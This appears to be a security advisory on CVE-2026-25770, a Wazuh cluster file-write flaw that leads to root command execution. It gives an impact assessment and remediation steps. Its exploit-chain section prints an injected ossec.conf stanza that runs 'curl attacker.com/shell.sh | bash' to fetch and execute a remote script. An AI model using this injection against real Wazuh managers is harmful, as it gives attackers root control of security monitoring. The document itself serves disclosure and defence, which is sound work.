CVE-2026-25770: Wazuh Root RCE via Cluster Protocol File Write
A critical privilege escalation vulnerability has been disclosed in Wazuh, the open-source SIEM and XDR platform, tracked as CVE-2026-25770 (CVSS 9.1, Critical). The flaw affects Wazuh versions 3.9.0 through 4.14.2 and allows an authenticated cluster node to escalate to root code execution on the Wazuh manager by overwriting the manager configuration file via the cluster synchronization protocol.
Unlike the companion CVE-2026-25769 (insecure deserialization RCE), this vulnerability exploits a design flaw in the cluster file synchronization mechanism combined with insecure default file permissions — enabling an indirect but reliable root code execution path. The fix is available in Wazuh 4.14.3, released March 17, 2026.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-25770 |
| CVSS Score | 9.1 (Critical) |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |
| CWE Classification | CWE-22 (Path Traversal), CWE-269 (Improper Privilege Management), CWE-732 (Incorrect Permission Assignment) |
| GHSA ID | GHSA-r4f7-v3p6-79jm |
| Affected Software | Wazuh 3.9.0 – 4.14.2 |
| Fixed Version | Wazuh 4.14.3 |
| Attack Vector | Network |
| Authentication Required | High (cluster credentials) |
| Scope | Changed — wazuh-user escalates to root via trusted service |
| In-the-Wild Exploitation | Not confirmed at time of disclosure |
| Patch Available | Yes — March 17, 2026 |
Technical Analysis
Root Cause: Insecure File Permissions + Cluster File Sync
The wazuh-clusterd service provides a cluster synchronization protocol that allows authenticated cluster nodes to distribute files across the Wazuh cluster. The vulnerability arises from two compounding issues:
- Unrestricted file write via cluster protocol: Authenticated cluster nodes can write arbitrary files to the manager filesystem under the
wazuhsystem user's permissions — without sufficient path restrictions - Insecure default permissions on
ossec.conf: The main Wazuh manager configuration file at/var/ossec/etc/ossec.confis writable by thewazuhsystem user by default
Exploit Chain
1. Attacker gains access to cluster credentials
(via compromise of a worker node, credential theft, or insider access)
2. Uses the cluster file synchronization protocol to overwrite
/var/ossec/etc/ossec.conf with a modified configuration
3. The malicious ossec.conf includes an injected <localfile> command stanza:
<localfile>
<log_format>command</log_format>
<command>curl attacker.com/shell.sh | bash</command>
<frequency>60</frequency>
</localfile>
4. wazuh-logcollector (running as root) parses the updated configuration
on its next config reload cycle
5. logcollector executes the injected command with root privileges
6. Attacker achieves full root code execution on the Wazuh managerWhy logcollector Runs as Root
wazuh-logcollector requires root privileges to read system log files (e.g., /var/log/auth.log, kernel logs, SELinux audit logs) and to bind to privileged monitoring interfaces. This design is a common pattern in SIEM agents — but it means that any configuration injection into the logcollector config file directly results in root-level command execution.
Relationship to CVE-2026-25769
Both CVE-2026-25769 and CVE-2026-25770 were disclosed simultaneously and patched in Wazuh 4.14.3. They share a common attack prerequisite (access to cluster credentials or a worker node) but exploit distinct mechanisms:
| CVE-2026-25769 | CVE-2026-25770 | |
|---|---|---|
| Mechanism | JSON deserialization RCE | Config file overwrite → root command exec |
| Affected Versions | 4.0.0 – 4.14.2 | 3.9.0 – 4.14.2 |
| CWE | CWE-502 (Deserialization) | CWE-22, CWE-269, CWE-732 |
| Speed to Root | Direct (immediate RCE on master) | Indirect (waits for logcollector reload) |
| Detection Complexity | Moderate | Lower — config file changes are logged |
Both vulnerabilities should be treated with equal urgency and remediated simultaneously by upgrading to 4.14.3.
Impact Assessment
| Impact Area | Description |
|---|---|
| Confidentiality | Root access exposes all Wazuh data, agent credentials, and API keys |
| Integrity | Configuration manipulation can disable alerting, alter detection thresholds, or suppress security events |
| Availability | Root access enables persistent backdoor installation or full service destruction |
| Blast Radius | Wazuh master typically has agent management access across all monitored endpoints |
| SIEM Integrity | Compromise of the security monitoring platform removes detection capability across the entire monitored environment |
Remediation
Primary Fix: Upgrade to Wazuh 4.14.3
# Update all Wazuh manager nodes
apt-get update && apt-get install wazuh-manager=4.14.3-*
# Restart the manager
systemctl restart wazuh-manager
# Verify the fix
/var/ossec/bin/wazuh-control info | grep -i versionHarden File Permissions (Defense-in-Depth)
Even after patching, review and restrict permissions on critical Wazuh config files:
# Restrict ossec.conf to root-only write
chown root:wazuh /var/ossec/etc/ossec.conf
chmod 640 /var/ossec/etc/ossec.conf
# Audit all files writable by the wazuh user in the ossec directory
find /var/ossec -user wazuh -writable -type f | grep -v "queue\|logs\|tmp"Monitor for Configuration Changes
# Add inotifywait monitoring for ossec.conf modifications
inotifywait -m /var/ossec/etc/ossec.conf -e modify |
while read path action file; do
echo "ossec.conf modified — audit immediately" | logger -p security.alert
done
# Review cluster sync activity
grep "cluster\|sync\|file" /var/ossec/logs/cluster.log | tail -200Any unexpected modifications to /var/ossec/etc/ossec.conf outside of normal change management windows should be treated as a potential compromise indicator.
Key Takeaways
- CVE-2026-25770 allows authenticated cluster nodes to overwrite
ossec.conf, triggering root command execution via thewazuh-logcollectorservice - CVSS 9.1 (Critical) — closely mirrors the impact scope of companion CVE-2026-25769, which was disclosed and patched simultaneously
- Broader version range (3.9.0–4.14.2) vs CVE-2026-25769 (4.0.0–4.14.2) — organizations on older Wazuh versions are equally at risk
- No confirmed in-the-wild exploitation at disclosure, but given simultaneous Mirai activity targeting CVE-2026-25769, exploitation of CVE-2026-25770 should be anticipated
- Upgrade to Wazuh 4.14.3 resolves both CVEs — prioritize if you are running any Wazuh cluster deployment
- File permission hardening provides meaningful defense-in-depth even on patched systems